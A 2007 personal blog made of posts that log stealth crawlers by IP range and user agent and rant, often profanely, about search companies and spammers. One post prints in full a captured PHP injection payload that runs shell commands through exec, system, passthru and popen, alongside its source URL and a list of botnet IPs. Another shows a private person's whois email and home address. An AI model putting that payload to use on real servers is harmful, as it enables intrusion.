Please tell me what gives you the right to scan thousands of pages without permission and then threaten to dump our ass if we don't let you run rampant without control over our website?

That's some pretty big balls even for Microsoft!

Since it's annoying some people for no sane reason I say go block the IP range and go back to sleep because Microsoft doesn't send enough traffic to put up with this abuse in the first place.

Besides, Microsoft has some damned explaining to do before they have any room to bully people as I've got quite the list of documented abuse from that IP range that would justify anyone blocking the bad behavior exhibited on 131.107.0.*.

That's my $0.02.

FIRST LOOK: Yahoo Crawler Using Firefox UA

Woke up this morning to find my bot blocker had bitch slapped 300+ crawl attempts by Yahoo using the following criteria:

74.6.22.170 [llf520057.crawl.yahoo.net.] requested 302 pages as
"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071102 BonEcho/2.0.0.4"

Upon further examination it appears that this activity started on 11/17/2007 and the IP address used is a Yahoo proxy and some of the forwarded IPs were:

74.6.18.46 -> rz502516.crawl.yahoo.net.
74.6.18.160 -> rz502426.crawl.yahoo.net.
74.6.18.163 -> rz502429.crawl.yahoo.ne

a lot more 74.6.18.* IPs etc., you get the idea...

What was curious is the version of Firefox claimed to be Bon Echo which if I'm not mistaken was pre-release Firefox 2 code.

Didn't look like they were making screen shots based on todays activity unless they had already cached the images so I'm not sure what in the hell Yahoo's up to at this point.

Take a look in your logs as I find it hard to believe I'm the only one seeing this.

Saturday, November 17, 2007

Don't Just Block Spam, Block Spammers Too!

Most modern blog anti-spam efforts are based on just protecting the comment forms which is a very narrow focus. When some spambot or someone posts something bad it's automatically trapped and discarded by tools like Askimet. However, I don't think this solution goes far enough to solve the problem as it only puts a band-aid on the comments page.

What I'm going to suggest, which I recently did to a few of my sites, is to go a step beyond just the comments page and punish bad behavior with banishment.

Why not ban the spammer?

You've trapped the spam and you know he/she/it is up to no good so why let them continue to access your site at all?

What if tools like Askimet not only blocked the spam but locked the spammer out of every site running Askimet worldwide?

If Askimet and a bunch of the other anti-spam tools could pool their spammer data then you could effectively block them from ever accessing any website ever again.

Now THAT's how you punish a spammer, ban him from the worldwide community!

This is not a new concept as RBL lists have been used for things like this in the past as spammers IP's were not only used to block incoming mail but added to the server firewall as well. However, the more recent web-based technologies have tended to be very narrow focused and missed the bigger opportunity to thwart problem spammers in a better way such as ACCESS DENIED to the web in general.

Consider that many modern well protected websites that are cranking up security block access from data centers and proxy servers leaving spammers few options besides direct residential connections and botnets. Assuming spammers might rent out botnets it would have to be hijacked residential PC's since servers from blocked data centers won't do them much good being often blocked already. Therefore, assuming spammers were forced to use botnets to do their bidding, they would unwittingly block innocent people that would shortly discover their machines are infected and get them fixed.

What a concept!

Ostracizing spammers could even get people with compromised PC's off the botnet too!

Spammers would think twice about ever spamming again if each attempt permanently cost them more and more access to the web so maybe, just maybe, we can end spam in our lifetime just by changing the anti-spam technology being deployed as a complete front-end security system for the website after the comment form triggers the alarm and alerts the entire anti-spam community.

OK, there could be a few innocent casualties but the greater good to permanently eradicate spam and even botnets completely outweighs the impact of a little friendly fire.

I'm banning spammers to clean up the online environment, how about you?

Friday, November 16, 2007

Microsoft Crawling with Perl Script?

Wonder what the boys in Redmond are up to using Perl instead of one of their beloved Microsoft languages?

131.107.0.96 [tide526.microsoft.com.] requested 6 pages as "libwww-perl/5.805"
131.107.0.95 [tide525.microsoft.com.] requested 6 pages as "libwww-perl/5.805"

Makes you go Hmmmm...

Thursday, November 15, 2007

That Rant Wasn't About Anal Sex!

My heart warming Christmas rant from last year entitled "Good Will Toward Men but FUCK WOMEN DRIVERS" has almost ranked in the top 10 for anal sex under #8 for 'but fuck'.

Ah well, one "T" short of major porn affiliate ads running on the site.

Maybe next year we'll be blessed with a 'butt fuck' ranking.

Sigh, until then I can only dream of free porn money....

Sunday, November 11, 2007

Attributor Post-Mortem Copyright Compliance Revisited

My first post about the emergence of Attributor was about a year ago and I thought it was time to review and see what we've learned since then.

Here's where they've crawled from that we've spotted:

63.209.14.55 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind27.attributor.com:3128 FORWARD=10.50.40.74

63.209.14.10 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Proxy VIA=1.1 ind25.attributor.com:3128 FORWARD=10.50.40.74

209.51.152.146 "Attributor.comBot"

66.231.188.172 "Attributor.comBot"

63.209.14.53 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

63.209.14.7 "Mozilla/5.0 (compatible; dejan/1.13.2 +http://www.attributor.com)"

Now the amusing part is the IP 209.51.152.146 as it's a proxy and it appears they aren't any smarter than the rest of the bots as 340+ crawls have come via that IP this year including msnbot, Googlebot, Twiceler, Gigabot, Snapbot and some others so you're in fine company with other stupid crawlers out there.

What's curious is that 66.231.188.172 is one of Gigablast's IPs, and some of the others may be as well but they resolve to Level 3 blocks as do other Gigablast IPs, but I didn't look hard enough to confirm, lazy I guess.

Now let's examine one of my favorite statements on their website:

...you will no longer have to hold back top content or impose technical barriers on its viewing; instead, quality content can be made more easily available to a larger number of consumers.

Excuse me?

My technical barriers [not used on this blog] stop the problem in the first place just so I don't need to pay anyone to go chasing my content around the billions of pages on the web. As a matter of fact, my technical barriers are what trapped your crawl attempts above and identified what IP's your bots were using. That means your technology can't get past my technology so you'll never know if I'm stealing anyone's material but I'm pretty sure you aren't stealing my bandwidth finding out.

So now you have to ask yourself which method is easiest to stop content theft, blocking data centers and bulk downloaders on the fly or scanning billions of web pages looking for theft after the cows have already left the barn?

Bot blocking wins hands down as it's more cost effective without a doubt.

The best part is if someone wants to license your content you'll get 100% of the profits and not share with some company that wants to chase around the vast wasteland of the web looking for violators.

Maybe Attributor has some other places they crawl from without the user agent identifying the source, but that just means the bot blocker will stop and quarantine some anonymous IP address and we may never know it's really them.

Doesn't matter, I'm still banking on proactive content theft prevention technology and not reactive technology as it's easier to keep your cows at home when the fences are all closed and patrolled in the first place than try to round 'em up later.

Saturday, November 10, 2007

Websense Stealth Crawler Bypassing Security?

What I find amusing are security companies that claim to be protecting the web while violating access control measures on web servers all over the world.

Here's what I see coming from WebSense that's obvious:

208.80.193.29 Mozilla/5.0 (compatible; Konqueror/3.0-rc2; i686 Linux; 20020108)
208.80.193.30 Mozilla/5.0 (compatible; Konqueror/3.0-rc4; i686 Linux; 20020418)
208.80.193.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.34 Mozilla/5.0 (compatible; Konqueror/3.1; i686 Linux; 20020213)
208.80.193.36 Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020328)
208.80.193.37 Mozilla/5.0 (compatible; Konqueror/3.1-rc4; i686 Linux; 20020520)
208.80.193.41 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)
208.80.193.42 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312462)
208.80.193.51 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312460)
208.80.193.52 Mozilla/5.0 (compatible; Konqueror/3.0-rc6; i686 Linux; 20020204)

It makes me wonder if deliberately trying to bypass security measures in place that are designed to keep robots like WebSense off a server, such as robots.txt, .htaccess and other access controls, may violate the "Computer Hacking and Unauthorized Access Laws"?

Proving they've been busily sneaking around on lots of servers won't be too hard either.

Maybe WebSense should just claim any site that blocks them is off limits since we don't want them on our servers instead of trying to circumvent our security measures.

That would make too much sense wouldn't it?

Of course someone could claim that bad sites would just cloak clean content if they know it's WebSense. However, I'd rather give explicit permission for WebSense and then it wouldn't bother me so much if they crawled in stealth from a different IP address knowing that I gave permission in the first place.

Here's some of their known IP ranges:

Websense 66.194.6.0 - 66.194.6.255
Websense 74.211.167.208 - 74.211.167.215
Websense, Inc 208.80.192.0 - 208.80.199.255

Not sure these are the same company as a couple are in Canada and the other is in a different city, but what the heck, make up your own mind on these:

Websense Inc 67.117.201.128 - 67.117.201.143
Websense Systems Inc. 64.69.80.104 - 64.69.80.111
Websense Systems Inc. 64.69.80.96 - 64.69.80.103

There you go, some good bot blocking to go with your morning coffee should start off a fine Monday!

Thursday, November 08, 2007

How to Super Charge Your Link Checker

Most external link checkers people use can only detect the simple problems with your links such as servers being offline, missing pages (404 errors), or some other type of server error making your outbound link technically broken. These old school link checkers don't know how to detect the myriad of soft 404 errors that send a "200 OK" as a result. Worse yet, traditional link checkers aren't smart enough to detect whether your outbound links have changed hands and are possibly in a domain park, converted to a porn site, or possibly contain malware.

Here's a few tips for those that may want to super charge your link checker to detect domains that have transitioned into domain parks or parked pages and catch those soft 404 errors.

1. Do a full trip DNS check on your domain names.

Example of a full trip DNS check: somedomain.com -> ip address -> somedomain.com

The resulting full trip DNS lookup for some domain parked sites return these domains:

landing.hitfarm.com.
sedoparking.com.
ddwww.tucows.com.
information.com.

Parked pages on GoDaddy are a bit more complex because it's a combination of parkwebwin + secureserver.net but not too terrible to interpret:

parkwebwin-v03.prod.mesa1.secureserver.net

2. Whois Lookup for more detailed information.

If the full trip DNS fails to uncover anything useful then getting the WHOIS information about the domain name and/or IP address might yield interesting results. You might find the site is hosted at Thoughtconvergence.com which runs trafficz.com, a domain park, or is hosted at Parked.com (duh!) or shows DNS servers such as NS1.PARKED.COM.

3. Examine the redirects and landing page names.

When you request the URL, assuming you process your own redirects, you can observe that certain types of soft 404 errors redirect to the home page of some servers or a standard default page served up by admin control panels. Additionally, some parked pages also have intermediate redirects that clearly identify the page is being redirected to a landing page which can also be trapped.

Some sites return a "200 OK" but the page lands on a page name like "404error.html" or "404.asp" and there are a large list of these. Unfortunately, just looking for any page with "404" in the page name will kick out many false positives but recording a list of these will help you quickly find a good list of them.

Some samples of various types of 404 pages and URLs you might find:

http_404_filenot_found.htm
erreur404.asp
decommissioned.php
/suspended.page/

4. Examine the page content

The least accurate method is to actually process the page content of the landing page to look for various fingerprints that can be used to detect a site gone bad. Simple phrases such as "this site is temporarily not available" or "this web site coming soon" can spot sites that are no longer active. The problem with this method is that the text fingerprints can easily be changed, may generate some false positives, and is the least reliable. However, it's often the final recourse to detecting 100s of bad pages so you just keep updating your list of fingerprints as you find them and manually double check these types of broken links for false positives.

5. Compare the previous WHOIS profile

Save copies of all the whois information you get during link checking and use it in future link checks to detect ownership changes. Assuming the link checker passes the site after all of the above profile checks, compare the current WHOIS information to the last time you checked the site. Odds are that if the site has changed hands it no longer contains the content you originally linked to and may be a link you want to remove.

Summary

Now you know all of my basic ingredients for building a super charged link checker and should have some ideas on how to spruce up your own link checker. Building the ultimate link checker is nothing simple that can be accomplished in a day nor does working on it ever stop because the internet is constantly changing. However, if you have a ton of outbound links or run a large directory a super charged link checker is the only way to check links and time spent building the link checker is far better than manually checking tens of thousands of links by hand.

Another Stealth Crawler via Extended Host

Here we go with another stealth crawler operating from Extended Host:

194.110.162.19 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.225 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.227 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.231 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.84 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.85 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.86 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.87 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.88 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.89 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.92 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.93 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.94 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
194.110.162.96 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Here's the Extended Host IP range:

inetnum: 194.110.160.0 - 194.110.163.255
netname: EXTHOST-NET
descr: Extended Host

They just keep coming and I just keep closing more holes they slither through.

Tuesday, November 06, 2007

Even MORE Stealth Crawling Hosted at Corporate Colo

Here's yet another stealth crawler that came from Corporate Colocations's IP range:

74.124.192.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.138 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.161 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.162 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.175 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.181 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.183 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.195 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.198 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
74.124.192.215 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Here's their list of IP ranges:

Corporate Colocation Inc. MZIMA01-CUST-CORPCOLO02
64.235.225.8 - 64.235.225.15

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO04
216.193.219.0 - 216.193.219.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO01
216.193.197.0 - 216.193.197.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO03
216.193.208.0 - 216.193.208.63

Corporate Colocation Inc. CORPCOLO-206-62-132-0-22
206.62.132.0 - 206.62.135.255

Corporate Colocation Inc. CORPCOLO-206-62-144-0-23
206.62.144. - 206.62.145.255

Corporate Colocation Inc. CORPCOLO-206-62-146-0-22
206.62.146.0 - 206.62.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO05
216.193.251.0 - 216.193.251.255

Corporate Colocation Inc. NET-216-152-242-0-24
216.152.242.0 - 216.152.242.255

Corporate Colocation Inc. CORPCOLO-NET
205.134.224.0 - 205.134.255.255

Corporate Colocation Inc. NET-216-151-149-0-24
216.151.149.0 - 216.151.149.255

Corporate Colocation Inc. MZIMA02-CUST-CORPCOLO10
72.37.152.0 - 72.37.152.255

Corporate Colocation Inc. MZIMA03-CUST-CORPCOLO09
72.37.131.80 - 72.37.131.87

Corporate Colocation Inc. CORPCOLO-NET02
66.117.0.0 - 66.117.15.255

Corporate Colocation Inc. CORPCOLO-NET03
74.124.192.0 - 74.124.223.255

Corporate Colocation MZIMA01-CUST-CORPCOLO05
64.235.225.224 - 64.235.225.239

Corporate Colocation MZIMA01-CUST-CORPCOLO06
64.235.227.96 - 64.235.227.111

Corporate Colocation MZIMA01-CUST-CORPCOLO08
64.235.238.224 - 64.235.238.231

Corporate Colocation MZIMA01-CUST-CORPCOLO07
64.235.237.64 - 64.235.237.71

That little list of IPs should give you all some fun adding to your firewalls and .htaccess files.

Enjoy.

More Stealth Crawling Hosted at OC3Networks

No clue who or what this crawler is but it's coming from OC3Networks datacenter.

Here's the IPs and the user agent coming from their network:

72.11.155.106 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.112 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.113 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.125 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.131 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.137 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.154 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.197 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.204 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.211 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.219 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.223 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.228 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.236 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.237 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.246 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.34 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.5 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.57 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.61 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.63 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.64 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)
72.11.155.90 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; T312461; .NET CLR 1.1.4322)

Here's their ranges of IPs:

OC3 Networks & Web Solutions, LLC OC3-NETWORKS
66.63.160.0 - 66.63.191.255

OC3 Networks & Web Solutions, LLC OC3-NETWORKS
72.11.128.0 - 72.11.159.255

OC3 Networks ISWT-207-178-200-0
207.178.200.0 - 207.178.200.63

OC3 Networks OC3-NETWORKS-DSLUSERS
66.63.163.0 - 66.63.164.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.176.0 - 66.63.176.255

OC3 Networks OC3-NETWORKS--DEDICATED-SERVERS-RANGE
66.63.179.0 - 66.63.179.255

OC3 Networks OC3-NETWORKS---COLOCATIONS-VOIP
66.63.178.0 - 66.63.178.127

Not sure I'd block the DSLUSERS range but the rest look like fair game.

Enjoy.

Munax Stealth Crawler

Stumbled upon a stealth crawler hitting my site from multiple IPs and it turned out to belong to Munax who claims right up front that they haven't named their crawler and fake being a legit user which is pretty damned scummy.

My guess would be they figured out they couldn't access sites with good security so they decided to get around it without a bot name, but here's some bullshit excuse they use:

Our crawler does not have a "name", yet. Instead it announces itself to be a standard web browser, a "Mozilla 4.0" kind-of-browser compatible with the browser Microsoft Internet Explorer 6.0, running on the Windows NT 5.1 operating system. The reasons for this are: (a) Today, web servers are intelligent enough to react on the type of user agent. If our crawlers had a name, say MunaxRob or something like that, many web servers would not know about it and would return junk or maybe nothing at all. (b) We want the web server to return a page to us where the page looks as close as possible to a page that can be viewed with a standard web browser. This, to create the best possible indexing in our database and a WYSIWYG experience for anybody that is visiting our search engine.

Well listen up fuckheads, there's a reason we would return junk or nothing at all which is we don't want your goddamn spider crawling our fucking website!

What part of FUCK OFF! don't you understand that drives you to bypass our security and crawl regardless of whether we want you or not?

Amazingly they admit their IP range:

Your site might have been visited by our crawlers, with network addresses in the range of 82.99.30.2 - 82.99.30.73. Here is a short FAQ answering some of the questions you might have:

I've confirmed this crawl range in my logs:

82.99.30.15 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.17 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.21 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.25 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.26 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.30 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.33 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.37 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.45 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.54 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
82.99.30.67 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Well, this fucking crawler is now blocked.

Bunch of bullshit....

Sunday, October 28, 2007

Hackers Try Another Botnet Attack

Here we go again with the hackers making another run at one of my websites trying to inject PHP code into a site that doesn't even have PHP enabled which is amusing at best.

The script they were trying to inject was located here:

http://www.doncapone.com.br/.,/n?

Here's a copy of their PHP script for your viewing pleasure:

<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>"; // md5('xeQt');
echo "Uname:$ker<br>";
echo "SySOs:$osx<br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
       $res = '';
       if (!empty($cfe))
       {
               if(function_exists('exec'))
               {
                       @exec($cfe,$res);
                       $res = join("\n",$res);
               }
               elseif(function_exists('shell_exec'))
               {
                       $res = @shell_exec($cfe);
               }
               elseif(function_exists('system'))
               {
                       @ob_start();
                       @system($cfe);
                       $res = @ob_get_contents();
                       @ob_end_clean();
               }
               elseif(function_exists('passthru'))
               {
                       @ob_start();
                       @passthru($cfe);
                       $res = @ob_get_contents();
                       @ob_end_clean();
               }
               elseif(@is_resource($f = @popen($cfe,"r")))
               {
                       $res = "";
                       while(!@feof($f)) { $res .= @fread($f,1024); }
                       @pclose($f);
               }
       }
       return $res;
}
?>

Here's a list of IP's with reverse DNS of the botnet involved with the attack so you can get an idea that any machine can be infected, it's pretty random:

121.119.172.33
newsclip.be

134.76.41.1
saturn.roentgen.physik.uni-goettingen.de.

195.14.56.16
netgenic.pac.ru.

195.205.77.30
bsd.page.pl.

195.77.190.208
www.medinalaboral.com.

198.189.237.157
garnet.csumb.edu.

200.89.153.204
gw0fibertel.tenroses.com.ar.

203.146.127.143
mail.wisetair.com.

203.146.129.149
not found: 3(NXDOMAIN)

203.81.43.130
130.128.43.81.203.in-addr.arpa.
mx1.mail.cliqo.com.

204.8.46.250
eaglemedia.com.

207.176.224.189
207-176-224-189.static-ip.ravand.ca.

207.44.178.47
mail.tmanshost.com.

208.101.13.198
server-center.net.

209.61.181.243
server4.sulek.net.

210.48.156.42
dns7.kutu.net.

211.62.35.151
not found: 3(NXDOMAIN)

212.110.119.85
www05.makolan.net.

212.174.113.76
mail.tros.gen.tr.

212.39.26.44
web22.hostdeck.com.

213.190.51.202
ns1.laisvas.lt.

213.218.141.11
caracas15.ecritel.net.

221.143.48.237
221-143-48-237.tongkni.co.kr.

222.231.2.50
b50.nskorea.com.

62.4.100.2
host.mantlik.cz.

64.91.251.107
nexus.sourcedns.com.

66.11.122.105
service66.11.122-105.serverprovider.com.

66.55.78.16
66-55-78-16.yourhostingprovider.net.

70.130.237.252
;; connection timed out; no servers could be reached

74.50.13.48
deneb.lunarpages.com.

81.173.242.33
gate.eyepower.de.

81.255.205.81
mail.chaffenay.com.

82.116.79.30
reseller.sircon.net.

82.195.230.142
gdp-lin-230-142.as16215.net.

82.67.222.122
bdy93-1-82-67-222-122.fbx.proxad.net.

85.13.194.179
cherryco.marketing-internet.com.

86.125.92.68
6-125-92-68.brasov.rdsnet.ro.

Pretty random list of sites infected with this botnet from locations throughout the world.

The bot blocker shut down all these attempts but I wonder what they'll try next time?

Kavam's SearchMe Charlotte Taking Screen Shots?

SearchMe has been around for a time but it looks like now they are taking screen shots.

For the novice looking at log files, any time you see FireFox for Linux that keeps methodically hitting pages over a long period of time you can almost assume with certainty that someone is making screen shots, especially when the IPs come from a data center.

Not only did I see screen shots being taken on my web pages, but I've seen their screen shot bot pulling images I have embedded on other web sites, so they're aggressively taking screen shots across the web.

Does the fact that they're taking screen shots mean that they're coming out of stealth mode and launching a new search service?

I'm speculating that this may be the case because taking screen shots is a very time consuming process and it wouldn't make sense to take screen shots and then let them all sit around aging and be totally out of date unless you intended to go public with some new search service soon.

Here's the screen shot activity to look for in your web logs:

209.249.86.17 - "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.5) Gecko/20070728 Firefox/2.0.0.5"

That IP belongs to:

Kavam MFN-T595-209-249-86-0-24 (NET-209-249-86-0-1)
209.249.86.0 - 209.249.86.255

Other activity in that IP range:

01/02/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.betaspider.com/)"

03/05/2007 "Mozilla/5.0 (compatible; Charlotte/1.0b; http://www.searchme.com/support/)"

Looks like Kavam is a legit company with funding and all that but making screen shots without changing the user agent to identify that's what they're doing is kind of lame. Very little is known about them other than they built Wikiseek, which has nothing to do with why they are attempting to crawl and screen shot my main web site, so they obviously have something new in the works.

I've decided to block them temporarily until they come out of stealth so I can see what they're up to because I don't need someone crawling a site with over 100K pages unless they give me a damn good reason ;)

Tuesday, October 23, 2007

Did NBCSearch Spam?

I've heard of NBCSearch and Mainstream Advertising before but never paid them any attention until 2 copies of the following showed up in my generic inboxes the other day, like sales, support, info, you know the things most companies have that you can randomly use to send email when you don't actually know a real email address.

Hello,

My name is Sarkis Arshakuni and I am the Director of Business Development here at NBCSearch, SearchABC, and the Mainstream Search Network of sites. I have heard great things about the capability of your network and I know we would benefit from working together.

I'm interested in pursuing a strategic partnership. Mainstream Search and it's family of sites make us the largest online advertising company. And with the success of TrueClick our click fraud detection technology we have been developing and growing relationships with several tier one search companies. We have broad coverage, high CPCs and the best 2nd tier traffic on the market.

Below is our XML Test Feed for your review:

http://carcassonne.ozemailer.com/[snip]

Feel free to paste this into a browser and change out the keyword so you can see the strength of our coverage and bid prices. Once you view these, I am confident you will want to begin ASAP. Here's our sign up link to get started:

http://carcassonne.ozemailer.com/[snip]

Please let me know if you have any questions or will be available for a quick chat about this partnership. I look forward to hearing from you or the appropriate person so we can explore further.

Thanks in advance,

Sarkis Arshakuni
Business Development
[snip]
________________________
http://www.Mainstreamadvertising.com
http://www.Mainstreamasearch.com
[snip]

Anyway, out of curiosity I went to NBCSearch and the McAfee SiteAdvisor went off, then I looked and they don't appear to be indexed in Google whatsoever, and of all things they have a private registration on their domain name which is odd for a corporation.

Domain Name: NBCSEARCH.COM

Registrant [207419]:
Moniker Privacy Services

Lot's of red flags so I think I'll skip inquiring about advertising.

But thanks for asking... not!

Saturday, October 06, 2007

Express Link or Spam Exchange?

Someone posted to my blog today about ExpressLinkExchange under the name Shanon Sandquist, who appears to have been quite busy lately.

Hey, this is an awesome blog you've
got here!! I'm definitely going to
bookmark it! By the way, I found a
awesome site that has similar kind of
link exchange kind of stuff! If you get
time, check it out.

www.ExpressLinkExchange.com

Posted by Shanon Sandquist to IncrediBILL's Random Rants at 10/06/2007 1:03 AM

Normally I would think it's a bogus name on one of those off topic blog posts but that name shows up in the WhoIs for ExpressLinkExchange so it's either the real person openly posting the same crap all over the place or someone trying to give them some reputation management issues.

whois expresslinkexchange.com

directNIC makes this information available "as is", and does not guarantee
its accuracy.

Registrant:
Homeworkers
2084 West, 12974 South
Riverton, UT 84065
US

Domain Name: EXPRESSLINKEXCHANGE.COM

Administrative Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Technical Contact:
Sandquist, Shanon Shanon3@Walla.com
2084 West, 12974 South
Riverton, UT 84065
US

Domain servers in listed order:
NS1.MPENET.COM 65.222.14.2
NS2.MPENET.COM 65.222.14.3

Hey, it looks like a great service, what could be wrong with signing up for links and making free money?

Right on the home page "...increase a website's traffic, link popularity and search engine ranking..." and there's even a directory of member sites!

Here's the best part on the FAQ page:

5. Does ExpressLinkExchange.com abide by the major search engine guidelines?

Yes, it does. The ExpressLinkExchange.com Link Exchange service is fully compliant with all of the major search engine guidelines and standards. We do not promote "blackhat" techniques such as cloaking, hidden text, or the use of doorway pages in order to artificially manipulate the search engine results. The ExpressLinkExchange.com Link Exchange service will help naturally boost your website's link popularity in the same manner that any typical manual link exchange campaign would. The only difference with our system is that it is fully automated. In addition, we provide our members with helpful articles to educate them on how to properly optimize their web pages for increased search engine ranking. Click here for more details on this topic.

Interesting point of view because the Google Webmaster Guidelines expressly says:

Quality guidelines - basic principles

Don't participate in link schemes designed to increase your site's ranking or PageRank. In particular, avoid links to web spammers or "bad neighborhoods" on the web, as your own ranking may be affected adversely by those links.

OK, which one of them would you believe?

Well let's all sign right up so we'll all be in a members list Google can easily track, good idea!

Sounds like a plan to me!

Friday, October 05, 2007
